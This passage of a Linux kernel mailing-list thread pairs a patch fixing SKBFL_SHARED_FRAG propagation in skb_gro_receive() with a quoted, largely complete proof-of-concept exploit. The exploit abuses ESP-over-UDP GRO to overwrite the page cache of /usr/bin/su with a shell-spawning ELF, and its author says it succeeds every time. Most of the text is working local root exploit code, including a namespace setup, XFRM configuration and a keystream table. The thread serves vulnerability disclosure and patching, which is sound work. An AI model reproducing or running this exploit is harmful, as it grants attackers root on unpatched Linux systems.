pass = 0; ; pass++) { size_t pass_changed = 0, remaining = 0; for (int idx = 0; idx < PAYLOAD_LEN; idx++) { unsigned char cur = read_byte_at(target_fd, idx); if (cur == shell_elf[idx]) continue; remaining++; unsigned char need_ks = cur ^ shell_elf[idx]; uint16_t nonce = stream_nonce[need_ks]; unsigned char iv[8]; memset(iv, 0xcc, sizeof(iv)); store_be32(iv + 4, nonce); unsigned char hdr[16]; char hp[] = "/tmp/fgro-XXXXXX"; int hfd = mkstemp(hp); unlink(hp); store_be32(hdr, ESP_SPI); store_be32(hdr + 4, seq++); memcpy(hdr + 8, iv, 8); write(hfd, hdr, 16); int pfd[2]; pipe(pfd); loff_t ho = 0; splice(hfd, &ho, pfd[1], NULL, 16, 0); loff_t so = (loff_t)idx; splice(target_fd, &so, pfd[1], NULL, SPLICE_LEN, 0); close(hfd); unsigned char p1[16 + SPLICE_LEN]; store_be32(p1, ESP_SPI); store_be32(p1 + 4, seq++); memcpy(p1 + 8, iv, 8); memset(p1 + 16, 0x41, SPLICE_LEN); send(sock, p1, sizeof(p1), 0); int cork = 1; setsockopt(sock, IPPROTO_UDP, UDP_CORK, &cork, sizeof(cork)); splice(pfd[0], NULL, sock, NULL, 16 + SPLICE_LEN, 0); cork = 0; setsockopt(sock, IPPROTO_UDP, UDP_CORK, &cork, sizeof(cork)); close(pfd[0]); close(pfd[1]); usleep(sleep_us); unsigned char got = read_byte_at(target_fd, idx); if (got == shell_elf[idx]) { total_changed++; pass_changed++; clock_gettime(CLOCK_MONOTONIC, &last_ok); printf("\r[+] byte %3d/%-3d 0x%02x -> 0x%02x ok (%zu changed)", idx, PAYLOAD_LEN, cur, got, total_changed); } else { printf("\r[-] byte %3d/%-3d 0x%02x -> 0x%02x (want 0x%02x) MISS", idx, PAYLOAD_LEN, cur, got, shell_elf[idx]); } fflush(stdout); } if (remaining == 0) break; size_t still_wrong = 0; for (int idx = 0; idx < PAYLOAD_LEN; idx++) if (read_byte_at(target_fd, idx) != shell_elf[idx]) still_wrong++; if (still_wrong == 0) break; struct timespec now; clock_gettime(CLOCK_MONOTONIC, &now); long elapsed = (now.tv_sec - last_ok.tv_sec) * 1000 + (now.tv_nsec - last_ok.tv_nsec) / 1000000; if (elapsed > 30000) { printf("\n[!] %zu bytes stuck after 30s without progress\n", still_wrong); break; } if (delay_ms < 500) { delay_ms = delay_ms < 250 ? delay_ms * 2 : 500; sleep_us = delay_ms * 2000; char cmd[128]; snprintf(cmd, sizeof(cmd), "tc qdisc change dev " VETH0 " root netem delay %dms", delay_ms); system(cmd); } printf("\n[*] pass %d: %zu ok, %zu still wrong, delay now %dms, retrying\n", pass + 1, pass_changed, still_wrong, delay_ms); fflush(stdout); } close(target_fd); close(sock); kill(rx, SIGTERM); waitpid(rx, NULL, 0); /* Final verification: count how many bytes match shell_elf */ int final_fd = open(target_file, O_RDONLY | O_CLOEXEC); size_t matching = 0; if (final_fd >= 0) { for (int i = 0; i < PAYLOAD_LEN; i++) if (read_byte_at(final_fd, i) == shell_elf[i]) matching++; close(final_fd); } printf("\n\n"); if (total_changed > 0) { printf("VULNERABLE: %zu/%d payload bytes now match shell_elf " "(%zu written via GRO flag-strip)\n", matching, PAYLOAD_LEN, total_changed); _exit(1); } printf("FIXED: 0/%d bytes changed\n", PAYLOAD_LEN); _exit(0); } [-- Attachment #3: 0001-net-gro-propagate-SKBFL_SHARED_FRAG-in-skb_gro_recei.patch --] [-- Type: text/plain, Size: 3337 bytes --] From c3ec785f197bf329c443aa547eb70864e2ef29ac Mon Sep 17 00:00:00 2001 From: Sultan Alsawaf <sultan@kerneltoast.com> Date: Wed, 13 May 2026 21:47:51 -0700 Subject: [PATCH] net: gro: propagate SKBFL_SHARED_FRAG in skb_gro_receive() skb_gro_receive() moves frag descriptors from the incoming skb to the GRO accumulator through two frag-transfer paths (the direct frag-move loop and the head_frag + memcpy path) without propagating the SKBFL_SHARED_FRAG flag from the incoming skb's shinfo->flags. As a result, the accumulator ends up holding references to externally owned or page-cache-backed pages while reporting skb_has_shared_frag() as false. This is the same bug class as CVE-2026-46300 (d8cfbcdd07557, "net: skbuff: propagate shared-frag marker through frag-transfer helpers"), which fixed the identical omission in __pskb_copy_fclone(), skb_try_coalesce(), and skb_shift(). skb_gro_receive() was missed in that fix since it lives in net/core/gro.c rather than net/core/skbuff.c. The impact is observable through ESP-over-UDP with UDP GRO: splice() attaches page-cache pages to a UDP skb, setting SKBFL_SHARED_FRAG via ip_append_page(). When two such datagrams are GRO-merged via skb_gro_receive(), the flag is dropped. After udp_rcv_segment() re-segments the merged GSO skb, the fresh segments carry the page-cache frags without the shared-frag marker. esp_input() then sees !skb_cloned() && !skb_has_shared_frag() and takes the skip_cow fast path, decrypting in place over the page-cache pages. Because AES-GCM CTR decryption runs before the authentication tag is verified, the page cache is corrupted even though the tag check subsequently fails. Fix it by propagating SKBFL_SHARED_FRAG from the incoming skb to the accumulator in both frag-transfer paths, matching what the skbuff.c helpers already do. The third path (frag_list merge at the "merge:" label) chains the entire incoming skb onto the accumulator's frag_list without moving individual frag descriptors, so each sub-skb retains its own flags and no propagation is needed there. Fixes: cef401de7be8 ("net: fix possible wrong checksum generation") Fixes: f4c50a4034e6 ("xfrm: esp: avoid in-place decrypt on shared skb frags") Cc: stable@vger.kernel.org Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Sultan Alsawaf <sultan@kerneltoast.com> --- net/core/gro.c | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/net/core/gro.c b/net/core/gro.c index 31d21de5b15a7..4ac41ced13aeb 100644 --- a/net/core/gro.c +++ b/net/core/gro.c @@ -145,6 +145,8 @@ int skb_gro_receive(struct sk_buff *p, struct sk_buff *skb) skb_frag_off_add(frag, offset); skb_frag_size_sub(frag, offset); + pinfo->flags |= skbinfo->flags & SKBFL_SHARED_FRAG; + /* all fragments truesize : remove (head size + sk_buff) */ new_truesize = SKB_TRUESIZE(skb_end_offset(skb)); delta_truesize = skb->truesize - new_truesize; @@ -176,6 +178,8 @@ int skb_gro_receive(struct sk_buff *p, struct sk_buff *skb) memcpy(frag + 1, skbinfo->frags, sizeof(*frag) * skbinfo->nr_frags); /* We dont need to clear skbinfo->nr_frags here */ + pinfo->flags |= skbinfo->flags & SKBFL_SHARED_FRAG; + new_truesize = SKB_DATA_ALIGN(sizeof(struct sk_buff)); delta_truesize = skb->truesize - new_truesize; skb->truesize = new_truesize; -- 2.54.0 ^ permalink raw reply related [flat|nested] 6+ messages in thread
* Re: [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers 2026-05-14 6:18 ` Sultan Alsawaf @ 2026-05-14 9:23 ` Hyunwoo Kim 0 siblings, 0 replies; 6+ messages in thread From: Hyunwoo Kim @ 2026-05-14 9:23 UTC (permalink / raw) To: Sultan Alsawaf Cc: davem, edumazet, kuba, pabeni, horms, kerneljasonxing, kuniyu, mhal, jiayuan.chen, steffen.klassert, vakzz, ben, herbert, dsahern, netdev, stable, imv4bel On Wed, May 13, 2026 at 11:18:10PM -0700, Sultan Alsawaf wrote: > On Thu, May 14, 2026 at 06:07:44AM +0900, Hyunwoo Kim wrote: > > Changes in v2: > > - Also propagate SHARED_FRAG in skb_shift() > > - v1: https://lore.kernel.org/all/agRfuVOeMI5pbHhY@v4bel/ > > Hi Hyunwoo, > > I've been working on mitigating this vulnerability as a member of the kernel > team at CIQ, a distro vendor. In particular, we wanted to make sure that there > weren't any lingering places missing SHARED_FRAG propagation. > > To that end, I used Claude to discover that skb_gro_receive() remained unpatched > (as you pointed out in the v1 thread). And then I generated a PoC exploiting the > vulnerable skb_gro_receive() path. > > The PoC is a modified version of the original fragnesia PoC. It works 100% of > the time, just like the original fragnesia PoC. > > I have attached the PoC and a patch that fixes skb_gro_receive(). Please take a > look at them. > > Thanks, > Sultan Nice catch. Thank you. After testing, I plan to merge your patch with v2 into a single patch (not a series) and submit it as v3. I would appreciate it if you could then add an appropriate credit tag of your own. Also, I would appreciate it if you could use AI to explore additional propagation variant paths. From my own analysis, no further ones have been identified. Best regards, Hyunwoo Kim > /* > * fragnesia-gro.c: skb_gro_receive() SKBFL_SHARED_FRAG page-cache corruption PoC > * > * Drop-in replacement for the espintcp fragnesia variant, targeting the same > * bug class (CVE-2026-46300) through the GRO frag-merge path instead of the > * espintcp path. Copies shell_elf over /usr/bin/su's page cache the same way > * the original fragnesia does. > * > * The exploit splices 17 bytes per round (1 byte ciphertext + 16 byte ICV) so > * each ESP decrypt corrupts exactly ONE target byte with no collateral damage. > * A precomputed IV table selects the AES-GCM keystream byte that XORs the > * current file content to the desired shell_elf byte. > * > * Based on the Fragnesia PoC by William Bowling / Hyunwoo Kim. > * > * Build: > * gcc -O2 -Wall -Wextra -static fragnesia-gro.c -o fragnesia-gro > * > * Run (as root): > * ./fragnesia-gro > * > * Exit codes: > * 1: vulnerable (page cache mutated through GRO flag-strip path) > * 0: fixed (byte unchanged) > * 2: local setup or argument error > * 4: namespace/veth gate closed > */ > > #define _GNU_SOURCE > > #include <arpa/inet.h> > #include <errno.h> > #include <fcntl.h> > #include <limits.h> > #include <net/if.h> > #include <netinet/in.h> > #include <sched.h> > #include <signal.h> > #include <stdbool.h> > #include <stdint.h> > #include <stdio.h> > #include <stdlib.h> > #include <string.h> > #include <sys/ioctl.h> > #include <sys/mount.h> > #include <sys/socket.h> > #include <sys/stat.h> > #include <sys/syscall.h> > #include <sys/types.h> > #include <time.h> > #include <sys/wait.h> > #include <unistd.h> > #include <linux/bpf.h> > #include <linux/if_addr.h> > #include <linux/if_alg.h> > #include <linux/netlink.h> > #include <linux/xfrm.h> > > /* ---- compat defines ---- */ > > #ifndef NLA_ALIGNTO > #define NLA_ALIGNTO 4 > #endif > #define NLA_ALIGN(len) (((len) + NLA_ALIGNTO - 1) & ~(NLA_ALIGNTO - 1)) > #ifndef NLA_HDRLEN > #define NLA_HDRLEN ((int)NLA_ALIGN(sizeof(struct nlattr))) > #endif > #ifndef RTM_NEWLINK > #define RTM_NEWLINK 16 > #endif > #ifndef RTM_NEWADDR > #define RTM_NEWADDR 20 > #endif > #ifndef NETLINK_ROUTE > #define NETLINK_ROUTE 0 > #endif > #ifndef NETLINK_XFRM > #define NETLINK_XFRM 6 > #endif > #ifndef IFLA_IFNAME > #define IFLA_IFNAME 3 > #endif > #ifndef IFLA_LINKINFO > #define IFLA_LINKINFO 18 > #endif > #ifndef IFLA_INFO_KIND > #define IFLA_INFO_KIND 1 > #endif > #ifndef IFLA_INFO_DATA > #define IFLA_INFO_DATA 2 > #endif > #ifndef VETH_INFO_PEER > #define VETH_INFO_PEER 1 > #endif > #ifndef IFLA_NET_NS_PID > #define IFLA_NET_NS_PID 19 > #endif > #ifndef IFA_LOCAL > #define IFA_LOCAL 2 > #endif > #ifndef IFA_ADDRESS > #define IFA_ADDRESS 1 > #endif > #ifndef NLA_F_NESTED > #define NLA_F_NESTED (1 << 15) > #endif > #ifndef ETHTOOL_SGRO > #define ETHTOOL_SGRO 0x0000002c > #endif > #ifndef ETHTOOL_STSO > #define ETHTOOL_STSO 0x0000001f > #endif > #ifndef ETHTOOL_SGSO > #define ETHTOOL_SGSO 0x00000024 > #endif > #ifndef SIOCETHTOOL > #define SIOCETHTOOL 0x8946 > #endif > #ifndef UDP_ENCAP > #define UDP_ENCAP 100 > #endif > #ifndef UDP_ENCAP_ESPINUDP > #define UDP_ENCAP_ESPINUDP 2 > #endif > #ifndef UDP_GRO > #define UDP_GRO 104 > #endif > #ifndef UDP_CORK > #define UDP_CORK 1 > #endif > #ifndef AF_ALG > #define AF_ALG 38 > #endif > #ifndef SOL_ALG > #define SOL_ALG 279 > #endif > #ifndef ALG_SET_KEY > #define ALG_SET_KEY 1 > #endif > #ifndef ALG_SET_OP > #define ALG_SET_OP 3 > #endif > #ifndef ALG_OP_ENCRYPT > #define ALG_OP_ENCRYPT 1 > #endif > #ifndef IFLA_XDP > #define IFLA_XDP 43 > #endif > #ifndef IFLA_XDP_FD > #define IFLA_XDP_FD 1 > #endif > #ifndef IFLA_XDP_FLAGS > #define IFLA_XDP_FLAGS 3 > #endif > #ifndef XDP_FLAGS_SKB_MODE > #define XDP_FLAGS_SKB_MODE (1U << 1) > #endif > > struct rtnl_ifinfomsg { > unsigned char ifi_family; > unsigned char __ifi_pad; > unsigned short ifi_type; > int ifi_index; > unsigned int ifi_flags; > unsigned int ifi_change; > }; > > /* ---- constants ---- */ > > #define VETH0 "veth0" > #define VETH1 "veth1" > #define ADDR_SRC "10.0.0.1" > #define ADDR_DST "10.0.0.2" > #define UDP_PORT 4500 > #define ESP_SPI 0x100 > #define ICV_LEN 16 > #define PAYLOAD_LEN 192 > /* > * Splice exactly 17 bytes per round: rfc4106 shifts the 8-byte IV into > * the AAD, so the inner GCM sees SPLICE_LEN bytes of ciphertext. With > * SPLICE_LEN - ICV_LEN = 1, exactly one frag byte is decrypted. > */ > #define SPLICE_LEN (1 + ICV_LEN) > > static const unsigned char xfrm_key[20] = { > 0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, > 0x88, 0x99, 0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0xff, > 0x01, 0x02, 0x03, 0x04 > }; > > static const uint8_t shell_elf[PAYLOAD_LEN] = { > 0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, > 0x02,0x00,0x3e,0x00,0x01,0x00,0x00,0x00,0x78,0x00,0x40,0x00,0x00,0x00,0x00,0x00, > 0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, > 0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00, > 0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, > 0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00, > 0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00, > 0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x31,0xff,0x31,0xf6,0x31,0xc0,0xb0,0x6a, > 0x0f,0x05,0xb0,0x69,0x0f,0x05,0xb0,0x74,0x0f,0x05,0x6a,0x00,0x48,0x8d,0x05,0x12, > 0x00,0x00,0x00,0x50,0x48,0x89,0xe2,0x48,0x8d,0x3d,0x12,0x00,0x00,0x00,0x31,0xf6, > 0x6a,0x3b,0x58,0x0f,0x05,0x54,0x45,0x52,0x4d,0x3d,0x78,0x74,0x65,0x72,0x6d,0x00, > 0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, > }; > > static const char *target_file = "/usr/bin/su"; > > /* ---- utility ---- */ > > static void die(const char *w) { fprintf(stderr, "%s: %s\n", w, strerror(errno)); exit(2); } > static void gate_fail(const char *w) { fprintf(stderr, "gate_closed: %s: %s\n", w, strerror(errno)); exit(4); } > > static void store_be32(unsigned char *p, uint32_t v) > { > p[0] = v >> 24; p[1] = v >> 16; p[2] = v >> 8; p[3] = v; > } > > static void sync_write(int fd) { unsigned char b = 1; if (write(fd, &b, 1) != 1) die("sync_write"); } > static void sync_read(int fd) { unsigned char b; if (read(fd, &b, 1) != 1) die("sync_read"); } > > static unsigned char read_byte_at(int fd, off_t off) > { > unsigned char b; > if (pread(fd, &b, 1, off) != 1) die("pread"); > return b; > } > > /* ---- netlink helpers ---- */ > > static int nl_ack_errno(char *buf, ssize_t len) > { > struct nlmsghdr *nlh; > for (nlh = (struct nlmsghdr *)buf; NLMSG_OK(nlh, (unsigned int)len); > nlh = NLMSG_NEXT(nlh, len)) { > if (nlh->nlmsg_type == NLMSG_ERROR) { > struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(nlh); > if (e->error == 0) return 0; > errno = -e->error; > return -1; > } > } > errno = EPROTO; > return -1; > } > > static void add_nlattr(struct nlmsghdr *nlh, size_t max, > unsigned short type, const void *data, size_t len) > { > size_t off = NLMSG_ALIGN(nlh->nlmsg_len); > struct nlattr *nla = (struct nlattr *)((char *)nlh + off); > if (off + NLA_HDRLEN + len > max) { fprintf(stderr, "nlmsg overflow\n"); exit(2); } > nla->nla_type = type; > nla->nla_len = NLA_HDRLEN + len; > memcpy((char *)nla + NLA_HDRLEN, data, len); > nlh->nlmsg_len = off + NLA_ALIGN(nla->nla_len); > } > > static struct nlattr *nest_begin(struct nlmsghdr *nlh, size_t max, unsigned short type) > { > size_t off = NLMSG_ALIGN(nlh->nlmsg_len); > struct nlattr *nla = (struct nlattr *)((char *)nlh + off); > if (off + NLA_HDRLEN > max) { fprintf(stderr, "nlmsg overflow\n"); exit(2); } > nla->nla_type = type; > nla->nla_len = NLA_HDRLEN; > nlh->nlmsg_len = off + NLA_HDRLEN; > return nla; > } > > static void nest_end(struct nlmsghdr *nlh, struct nlattr *nla) > { > nla->nla_len = (unsigned short)((char *)nlh + NLMSG_ALIGN(nlh->nlmsg_len) - (char *)nla); > } > > static void nl_talk(struct nlmsghdr *nlh, int proto, const char *label) > { > struct sockaddr_nl sa = { .nl_family = AF_NETLINK }; > char resp[4096]; > int fd = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, proto); > if (fd < 0) gate_fail(label); > if (bind(fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) gate_fail(label); > memset(&sa, 0, sizeof(sa)); > sa.nl_family = AF_NETLINK; > if (sendto(fd, nlh, nlh->nlmsg_len, 0, (struct sockaddr *)&sa, sizeof(sa)) < 0) gate_fail(label); > ssize_t r = recv(fd, resp, sizeof(resp), 0); > if (r < 0 || nl_ack_errno(resp, r) < 0) gate_fail(label); > close(fd); > } > > /* ---- network setup ---- */ > > static void if_up(const char *name) > { > struct ifreq ifr = {}; > int fd = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0); > if (fd < 0) gate_fail("socket"); > strncpy(ifr.ifr_name, name, IFNAMSIZ - 1); > if (ioctl(fd, SIOCGIFFLAGS, &ifr) < 0) gate_fail(name); > ifr.ifr_flags |= IFF_UP; > if (ioctl(fd, SIOCSIFFLAGS, &ifr) < 0) gate_fail(name); > close(fd); > } > > static void create_veth(void) > { > char buf[4096] = {}; > struct nlmsghdr *nlh = (struct nlmsghdr *)buf; > nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct rtnl_ifinfomsg)); > nlh->nlmsg_type = RTM_NEWLINK; > nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL; > ((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_family = AF_UNSPEC; > add_nlattr(nlh, sizeof(buf), IFLA_IFNAME, VETH0, strlen(VETH0) + 1); > struct nlattr *li = nest_begin(nlh, sizeof(buf), IFLA_LINKINFO | NLA_F_NESTED); > add_nlattr(nlh, sizeof(buf), IFLA_INFO_KIND, "veth", 5); > struct nlattr *id = nest_begin(nlh, sizeof(buf), IFLA_INFO_DATA | NLA_F_NESTED); > struct nlattr *pn = nest_begin(nlh, sizeof(buf), VETH_INFO_PEER | NLA_F_NESTED); > { size_t o = NLMSG_ALIGN(nlh->nlmsg_len); > memset((char *)nlh + o, 0, sizeof(struct rtnl_ifinfomsg)); > nlh->nlmsg_len = o + sizeof(struct rtnl_ifinfomsg); } > add_nlattr(nlh, sizeof(buf), IFLA_IFNAME, VETH1, strlen(VETH1) + 1); > nest_end(nlh, pn); nest_end(nlh, id); nest_end(nlh, li); > nl_talk(nlh, NETLINK_ROUTE, "create veth"); > } > > static void move_to_netns(const char *name, pid_t pid) > { > char buf[4096] = {}; > struct nlmsghdr *nlh = (struct nlmsghdr *)buf; > uint32_t ns_pid = (uint32_t)pid; > unsigned int idx = if_nametoindex(name); > if (!idx) gate_fail("if_nametoindex"); > nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct rtnl_ifinfomsg)); > nlh->nlmsg_type = RTM_NEWLINK; > nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; > ((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_family = AF_UNSPEC; > ((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_index = (int)idx; > add_nlattr(nlh, sizeof(buf), IFLA_NET_NS_PID, &ns_pid, sizeof(ns_pid)); > nl_talk(nlh, NETLINK_ROUTE, "move veth"); > } > > static void add_addr(const char *name, const char *addr) > { > char buf[4096] = {}; > struct nlmsghdr *nlh = (struct nlmsghdr *)buf; > struct in_addr a; > unsigned int idx = if_nametoindex(name); > if (!idx) gate_fail("if_nametoindex"); > inet_pton(AF_INET, addr, &a); > nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct ifaddrmsg)); > nlh->nlmsg_type = RTM_NEWADDR; > nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL; > struct ifaddrmsg *ifa = (struct ifaddrmsg *)NLMSG_DATA(nlh); > ifa->ifa_family = AF_INET; > ifa->ifa_prefixlen = 24; > ifa->ifa_index = idx; > add_nlattr(nlh, sizeof(buf), IFA_LOCAL, &a, sizeof(a)); > add_nlattr(nlh, sizeof(buf), IFA_ADDRESS, &a, sizeof(a)); > nl_talk(nlh, NETLINK_ROUTE, "add addr"); > } > > static void ethtool_set(const char *name, uint32_t cmd, uint32_t data) > { > struct ifreq ifr = {}; > struct { uint32_t cmd; uint32_t data; } val = { cmd, data }; > int fd = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0); > if (fd < 0) return; > strncpy(ifr.ifr_name, name, IFNAMSIZ - 1); > ifr.ifr_data = (void *)&val; > ioctl(fd, SIOCETHTOOL, &ifr); > close(fd); > } > > /* ---- XDP attach/detach for NAPI init ---- */ > > static void xdp_toggle(const char *name, int prog_fd, uint32_t flags) > { > char buf[4096] = {}; > struct nlmsghdr *nlh = (struct nlmsghdr *)buf; > unsigned int idx = if_nametoindex(name); > if (!idx) return; > nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct rtnl_ifinfomsg)); > nlh->nlmsg_type = RTM_NEWLINK; > nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; > ((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_family = AF_UNSPEC; > ((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_index = (int)idx; > struct nlattr *x = nest_begin(nlh, sizeof(buf), IFLA_XDP | NLA_F_NESTED); > add_nlattr(nlh, sizeof(buf), IFLA_XDP_FD, &prog_fd, sizeof(prog_fd)); > add_nlattr(nlh, sizeof(buf), IFLA_XDP_FLAGS, &flags, sizeof(flags)); > nest_end(nlh, x); > nl_talk(nlh, NETLINK_ROUTE, "xdp"); > } > > static void enable_veth_napi(const char *name) > { > struct bpf_insn { uint8_t code; uint8_t regs; int16_t off; int32_t imm; }; > struct bpf_insn prog[] = { { 0xb7, 0, 0, 2 }, { 0x95, 0, 0, 0 } }; > struct { uint32_t t; uint32_t c; uint64_t i; uint64_t l; > uint32_t a,b; uint64_t d; uint32_t e,f; char n[16]; } attr = {}; > static const char lic[] = "GPL"; > attr.t = 6; attr.c = 2; > attr.i = (uint64_t)(unsigned long)prog; > attr.l = (uint64_t)(unsigned long)lic; > int fd = (int)syscall(__NR_bpf, 5, &attr, sizeof(attr)); > if (fd < 0) return; > xdp_toggle(name, fd, XDP_FLAGS_SKB_MODE); > close(fd); > int m1 = -1; > xdp_toggle(name, m1, XDP_FLAGS_SKB_MODE); > } > > /* ---- user namespace ---- */ > > static void setup_userns(void) > { > uid_t uid = getuid(); > gid_t gid = getgid(); > int rp[2], mp[2]; > if (pipe(rp) < 0 || pipe(mp) < 0) die("pipe"); > pid_t c = fork(); > if (c < 0) die("fork"); > if (c == 0) { > char path[64], map[64]; pid_t pp = getppid(); > close(rp[1]); close(mp[0]); sync_read(rp[0]); > snprintf(path, sizeof(path), "/proc/%d/setgroups", pp); > int fd = open(path, O_WRONLY); if (fd >= 0) { write(fd, "deny", 4); close(fd); } > snprintf(path, sizeof(path), "/proc/%d/uid_map", pp); > snprintf(map, sizeof(map), "0 %u 1\n", uid); > fd = open(path, O_WRONLY); if (fd >= 0) { write(fd, map, strlen(map)); close(fd); } > snprintf(path, sizeof(path), "/proc/%d/gid_map", pp); > snprintf(map, sizeof(map), "0 %u 1\n", gid); > fd = open(path, O_WRONLY); if (fd >= 0) { write(fd, map, strlen(map)); close(fd); } > sync_write(mp[1]); _exit(0); > } > close(rp[0]); close(mp[1]); > if (unshare(CLONE_NEWUSER) < 0) gate_fail("unshare(CLONE_NEWUSER)"); > sync_write(rp[1]); sync_read(mp[0]); waitpid(c, NULL, 0); > setresgid(0, 0, 0); setresuid(0, 0, 0); > } > > /* ---- XFRM SA ---- */ > > static void add_sa(void) > { > char buf[4096] = {}; > char ab[sizeof(struct xfrm_algo_aead) + sizeof(xfrm_key)]; > struct nlmsghdr *nlh = (struct nlmsghdr *)buf; > nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct xfrm_usersa_info)); > nlh->nlmsg_type = XFRM_MSG_NEWSA; > nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; > struct xfrm_usersa_info *xs = (struct xfrm_usersa_info *)NLMSG_DATA(nlh); > xs->sel.family = AF_INET; > inet_pton(AF_INET, ADDR_SRC, &xs->saddr.a4); > inet_pton(AF_INET, ADDR_DST, &xs->id.daddr.a4); > xs->id.spi = htonl(ESP_SPI); xs->id.proto = IPPROTO_ESP; > xs->family = AF_INET; xs->mode = XFRM_MODE_TRANSPORT; xs->replay_window = 0; > xs->lft.soft_byte_limit = xs->lft.hard_byte_limit = XFRM_INF; > xs->lft.soft_packet_limit = xs->lft.hard_packet_limit = XFRM_INF; > memset(ab, 0, sizeof(ab)); > struct xfrm_algo_aead *a = (struct xfrm_algo_aead *)ab; > strcpy(a->alg_name, "rfc4106(gcm(aes))"); > a->alg_key_len = sizeof(xfrm_key) * 8; > a->alg_icv_len = ICV_LEN * 8; > memcpy(a->alg_key, xfrm_key, sizeof(xfrm_key)); > add_nlattr(nlh, sizeof(buf), XFRMA_ALG_AEAD, ab, sizeof(ab)); > struct xfrm_encap_tmpl encap = {}; > encap.encap_type = UDP_ENCAP_ESPINUDP; > encap.encap_sport = htons(UDP_PORT); > encap.encap_dport = htons(UDP_PORT); > add_nlattr(nlh, sizeof(buf), XFRMA_ENCAP, &encap, sizeof(encap)); > nl_talk(nlh, NETLINK_XFRM, "add SA"); > } > > /* ---- AES-GCM keystream ---- */ > > static void aes_ecb_block(int alg_fd, const unsigned char in[16], unsigned char out[16]) > { > char cb[CMSG_SPACE(sizeof(uint32_t))] = {}; > struct iovec iov = { (void *)in, 16 }; > struct msghdr msg = { .msg_iov = &iov, .msg_iovlen = 1, .msg_control = cb, .msg_controllen = sizeof(cb) }; > uint32_t op = ALG_OP_ENCRYPT; > struct cmsghdr *cm = CMSG_FIRSTHDR(&msg); > cm->cmsg_level = SOL_ALG; cm->cmsg_type = ALG_SET_OP; > cm->cmsg_len = CMSG_LEN(sizeof(op)); > memcpy(CMSG_DATA(cm), &op, sizeof(op)); > int ofd = accept4(alg_fd, NULL, NULL, SOCK_CLOEXEC); > if (ofd < 0) die("AF_ALG accept"); > if (sendmsg(ofd, &msg, 0) != 16) die("AF_ALG send"); > if (read(ofd, out, 16) != 16) die("AF_ALG read"); > close(ofd); > } > > /* > * rfc4106 shifts the 8-byte ESP IV into the AAD, so the inner GCM > * ciphertext starts at frag byte 0. The target byte is at CTR position 0. > */ > #define KS_POS 0 > > static uint16_t stream_nonce[256]; > static bool stream_have[256]; > > static void build_stream_table(void) > { > struct sockaddr_alg sa = { .salg_family = AF_ALG }; > strcpy((char *)sa.salg_type, "skcipher"); > strcpy((char *)sa.salg_name, "ecb(aes)"); > int fd = socket(AF_ALG, SOCK_SEQPACKET | SOCK_CLOEXEC, 0); > if (fd < 0) die("AF_ALG"); > if (bind(fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) die("AF_ALG bind"); > if (setsockopt(fd, SOL_ALG, ALG_SET_KEY, xfrm_key, 16) < 0) die("AF_ALG key"); > > unsigned int count = 0; > for (unsigned nonce = 0; nonce <= 0xffff && count < 256; nonce++) { > unsigned char iv[8], cb[16], out[16]; > memset(iv, 0xcc, sizeof(iv)); > store_be32(iv + 4, nonce); > memcpy(cb, &xfrm_key[16], 4); > memcpy(cb + 4, iv, 8); > store_be32(cb + 12, 2 + KS_POS / 16); > aes_ecb_block(fd, cb, out); > unsigned char b = out[KS_POS % 16]; > if (stream_have[b]) continue; > stream_have[b] = true; > stream_nonce[b] = (uint16_t)nonce; > count++; > } > close(fd); > if (count < 256) { fprintf(stderr, "incomplete stream table: %u/256\n", count); exit(2); } > } > > /* ---- main ---- */ > > int main(void) > { > setvbuf(stdout, NULL, _IONBF, 0); > > printf("[*] uid=%d euid=%d gid=%d egid=%d\n", > getuid(), geteuid(), getgid(), getegid()); > printf("[*] mode=gro_espinudp_pagecache_replace\n\n"); > > struct stat st; > if (stat(target_file, &st) < 0 || !S_ISREG(st.st_mode) || st.st_size < PAYLOAD_LEN + SPLICE_LEN) > die("stat target"); > > printf("[*] target=%s size=%lld\n", target_file, (long long)st.st_size); > > build_stream_table(); > printf("[*] stream_table=256 entries at ciphertext position %d\n", KS_POS); > > /* > * Fork before entering the user namespace. The child enters the > * user/net namespace and does all the page-cache corruption. The > * parent stays 